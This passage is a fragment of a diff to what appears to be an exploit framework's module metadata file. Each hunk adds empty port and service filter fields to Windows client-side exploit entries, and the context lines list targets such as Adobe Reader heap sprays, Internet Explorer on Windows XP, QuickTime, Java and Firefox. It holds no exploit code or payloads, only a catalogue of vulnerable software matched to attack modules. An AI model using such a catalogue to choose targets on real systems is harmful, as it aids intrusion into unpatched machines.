], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61869,6 +82145,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61907,6 +82189,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61948,6 +82236,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61985,6 +82279,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)" ], @@ -62021,6 +82321,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Universal (JS Heap Spray)" ], @@ -62058,6 +82364,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v9.0.0 (Windows XP SP3 English)", "Adobe Reader v8.1.2 (Windows XP SP2 English)" @@ -62097,6 +82409,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows English (JS Heap Spray)", "Adobe Reader Windows German (JS Heap Spray)" @@ -62131,6 +82449,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62169,6 +82493,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP / IE / Adobe Reader 10/11" ], @@ -62202,6 +82532,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.1.2 (Windows XP SP3 English)" ], @@ -62236,6 +82572,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62271,6 +82613,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT/2000/XP/2003 Automatic" ], @@ -62307,6 +82655,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP with IE 6", @@ -62345,6 +82699,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Amaya Browser v11" ], @@ -62379,6 +82739,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -62413,6 +82779,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62446,6 +82818,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English SP4", "Windows XP Pro English SP2" @@ -62481,6 +82859,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3" ], @@ -62517,6 +82901,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2", @@ -62557,6 +82947,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quicktime 7.7.3 with IE 8 on Windows XP SP3", "Quicktime 7.7.2 with IE 8 on Windows XP SP3", @@ -62594,6 +82990,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Apple QuickTime Player 7.1.3", @@ -62632,6 +83034,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apple QuickTime Player 7.6.6" ], @@ -62667,6 +83075,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -62702,6 +83116,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English ALL" @@ -62737,6 +83157,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -62770,6 +83196,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -62805,6 +83237,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -62838,6 +83276,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "epi.dll v10.0.4.18 on Windows XP SP3" ], @@ -62874,6 +83318,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -62906,6 +83356,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62940,6 +83396,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -62975,6 +83437,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0 English" ], @@ -63011,6 +83479,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63045,6 +83519,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63077,6 +83557,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 IE 6.0/7.0" ], @@ -63112,6 +83598,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63146,6 +83638,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63180,6 +83678,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63218,6 +83722,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63256,6 +83766,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cisco WebEx Extension 1.0.1" ], @@ -63291,6 +83807,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63331,6 +83853,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 / IE7 (No DEP)" @@ -63365,6 +83893,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -63397,6 +83931,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -63433,6 +83973,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63471,6 +84017,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63509,6 +84061,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63541,6 +84099,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -63574,6 +84138,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -63607,6 +84177,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63640,6 +84216,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP0/SP1 English", "Windows 2000 Pro English All" @@ -63675,6 +84257,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PSH (Binary)" ], @@ -63709,6 +84297,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 6 SP0-SP2 / Windows XP SP2 Pro English" ], @@ -63743,6 +84337,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mozilla Firefox 38 to 41" ], @@ -63779,6 +84379,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281" @@ -63814,6 +84420,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -63847,6 +84459,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English" ], @@ -63881,6 +84499,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -63916,6 +84540,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63951,6 +84581,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63985,6 +84621,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -64026,6 +84668,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -64061,6 +84709,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -64095,6 +84749,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XUpload.ocx 3.0.0.3 on Windows XP SP3 / IE6 SP3" ], @@ -64128,6 +84788,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English / IE6SP0-SP2" ], @@ -64164,6 +84830,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -64206,6 +84878,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic IE on Windows XP" ], @@ -64240,6 +84918,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -64276,6 +84960,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -64312,6 +85002,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64352,6 +85048,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64388,6 +85090,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -64422,6 +85130,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" ], @@ -64467,6 +85181,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -64510,6 +85230,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -64550,6 +85276,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "MS06-014 - RDS.DataSpace", @@ -64602,6 +85334,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -64641,6 +85379,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0 with Internet Explorer 6.0" ], @@ -64679,6 +85423,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 7 with Office 2007|2010", @@ -64715,6 +85465,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86/x64" ], @@ -64752,6 +85508,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6/7", @@ -64792,6 +85554,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64835,6 +85603,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64877,6 +85651,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP/Vista SP0-SP3 (IE6/IE7)", @@ -64914,6 +85694,12 @@ "platform": "Java,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Generic (Java Payload)" @@ -64952,6 +85738,12 @@ "platform": "Java,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)" @@ -64989,6 +85781,12 @@ "platform": "Java", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)" ], @@ -65027,6 +85825,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal (msvcr71.dll ROP)" ], @@ -65063,6 +85867,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows / Java 6 <=u18" ], @@ -65099,6 +85909,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Java Runtime on Windows x86" @@ -65135,6 +85951,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86" @@ -65171,6 +85993,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Java Runtime on Windows x86" @@ -65206,6 +86034,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP3 English", "Debugging" @@ -65240,6 +86074,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0SP1 English" ], @@ -65276,6 +86116,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -65309,6 +86155,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP2 English" ], @@ -65343,6 +86195,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -65375,6 +86233,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English All" @@ -65409,6 +86273,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -65444,6 +86314,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -65479,6 +86355,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Maxthon 3 (prior to 3.3) on Windows" ], @@ -65512,6 +86394,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1" ], @@ -65547,6 +86435,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -65580,6 +86474,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP2 English" ], @@ -65613,6 +86513,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -65650,6 +86556,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP - Firefox 8 / 8.0.1", @@ -65695,6 +86607,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 17 & Firefox 21 / Windows XP SP3" ], @@ -65732,6 +86650,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 17 / Windows XP SP3" ], @@ -65769,6 +86693,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003" ], @@ -65805,6 +86735,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Firefox 3.6.16 on Windows XP SP3", @@ -65843,6 +86779,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP - Firefox 7", @@ -65882,6 +86824,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto (Direct attack against Windows XP, otherwise through Java, if enabled)", "Firefox Runtime, fails with ASLR", @@ -65926,6 +86874,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Mozilla Firefox 3.6.16 (no JAVA)", @@ -65962,6 +86916,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT/XP/2003 Automatic" ], @@ -65999,6 +86959,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer 6 on Windows XP", "Internet Explorer 6 Windows 2000" @@ -66038,6 +87004,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP/2003/Vista Automatic" ], @@ -66080,6 +87052,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)", "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)" @@ -66119,6 +87097,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT 4.0 -> Windows 2003 SP1" ], @@ -66153,6 +87137,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0SP1 English" ], @@ -66188,6 +87178,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000/XP/2003 Universal" ], @@ -66222,6 +87218,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 -> Windows 2003 SP0" ], @@ -66259,6 +87261,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista", "IE6 on Windows NT, 2000, XP, 2003 (all languages)", @@ -66298,6 +87306,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66332,6 +87346,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 IE 6.0 SP0-SP2" ], @@ -66367,6 +87387,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 IE 6.0 SP0-SP2" ], @@ -66403,6 +87429,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66436,6 +87468,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 / Windows Vista SP0 / IE 7" ], @@ -66471,6 +87509,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 - IE6 - Office XP SP0", "Windows XP SP3 - IE6 - Office XP SP3" @@ -66511,6 +87555,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -66548,6 +87598,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66584,6 +87640,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66621,6 +87683,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -66663,6 +87731,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista", "IE 6 SP0-SP2 (onclick)", @@ -66701,6 +87775,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (Heap Spray)" ], @@ -66738,6 +87818,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer on Windows" @@ -66778,6 +87864,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 Automatic" ], @@ -66813,6 +87905,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66849,6 +87947,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66888,6 +87992,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Debug", @@ -66930,6 +88040,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 8", @@ -66970,6 +88086,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 7 on XP SP3", @@ -67012,6 +88134,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -67052,6 +88180,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3 / Visio Viewer 2010", @@ -67090,6 +88224,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -67131,6 +88271,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3 with msvcrt ROP", @@ -67172,6 +88318,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3 with msvcrt ROP", @@ -67209,6 +88361,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3" @@ -67251,6 +88409,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": 